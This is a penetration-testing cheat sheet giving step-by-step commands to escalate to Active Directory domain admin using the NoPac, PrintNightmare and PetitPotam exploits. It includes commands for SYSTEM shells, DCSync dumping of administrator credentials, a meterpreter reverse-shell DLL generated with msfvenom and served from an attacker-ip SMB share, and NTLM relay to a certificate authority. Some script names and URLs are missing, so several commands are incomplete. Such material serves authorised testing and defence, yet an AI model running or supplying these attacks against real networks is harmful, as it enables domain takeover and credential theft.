Privilege Escalation to Domain Admin using Known Exploits


  • NoPac is an intra-domain privilege escalation exploit that allows escalating privileges from any standard user to domain admin level access

  • This exploit path takes advantage of being able to change the SamAccountName of a computer account to that of a Domain Controller.

  • The flow of the attack is outlined here: SecureWorks Blog

Exploiting NoPac:

  1. Get the NoPac exploit: git clone

  2. Check if target is vulnerable: sudo python3 -dc-ip -use-ldap

  3. Get a SYSTEM shell as the built-in administrator: sudo python3 DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME -shell --impersonate administrator -use-ldap

  4. Perform DCSync against the built-in administrator: sudo python3 DOMAIN.NAME/validuser:validpassword -dc-ip -dc-host DC-NAME --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN.NAME/administrator


  • Vulnerability found in the Print Spooler service that runs on all Windows operating systems that allows for privilege escalation and remote code execution.

Exploiting PrintNightmare:

  1. Get the exploit: git clone

  2. Install cube0x0's version of impacket:

    pip3 uninstall impacket
    git clone
    cd impacket
    python3 ./ install
  3. Check if the Windows target has MS-PAR & MSRPRN exposed: @ | egrep 'MS-RPRN|MS-PAR'

  4. Generate a DLL payload to be used by the exploit to gain a shell session: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local-ip LPORT=anyport -f dll > backupscript.dll

  5. Create an SMB server and host a shared folder (Data) at the location of the DLL payload that the exploit will attempt to download: sudo -smb2support Data /path/to/backupscript.dll

  6. Run the exploit: sudo python3 '\\attacker-ip\CompData\backupscript.dll'


  • PetitPotam is an LSA spoofing vulnerability that allows forcing the domain controller to authenticate against another host using NTLM over port 445

  • This attack allows an unauthenticated user to take over the domain

  • More information about PetitPotam can be found here: DirkJanm Post

Exploiting PetitPotam:

  1. Start an NTLM relay: sudo -debug -smb2support --target http://DOMAIN/URL/to/Certificate/Authoirty/host --adcs --template DomainController Note: you can use certi to find the location of the CA

  2. Get Petit Potam: git clone

  3. Run Petit Potam. `python3 attacker-ip dc-ip

  4. If it worked, you will find the base64 encoded certificate for the domain controller on the NTLM relay shell

  5. Request a TGT for the domain controller using the certificate: python3 /PKINITtools/ DOMAIN.NAME/DC-NAME\$ -pfx-base64 <base64 certificate> = dc01.ccache

  6. Set the KRB5CCNAME environment variable to the previous output file: export KRB5CCNAME=dc01.ccache

  7. Perform DCSync using (-k) the previous ccache file : -just-dc-user DOMAIN.NAME/administrator -k -no-pass DC-NAME.DOMAIN.NAME

Last updated